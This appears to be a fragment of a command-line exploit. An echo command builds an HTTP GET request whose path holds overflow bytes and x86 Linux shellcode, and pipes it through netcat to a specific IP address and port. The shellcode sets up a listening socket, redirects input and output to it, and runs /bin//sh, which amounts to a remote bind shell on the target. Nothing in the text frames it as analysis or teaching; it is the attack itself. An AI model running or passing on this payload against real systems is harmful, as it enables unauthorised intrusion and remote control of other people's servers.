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-e "GET /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FF\xFD\xFF\xBF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31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x4B\x4E\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80 HTTP" | nc -v 152.3.137.81 9278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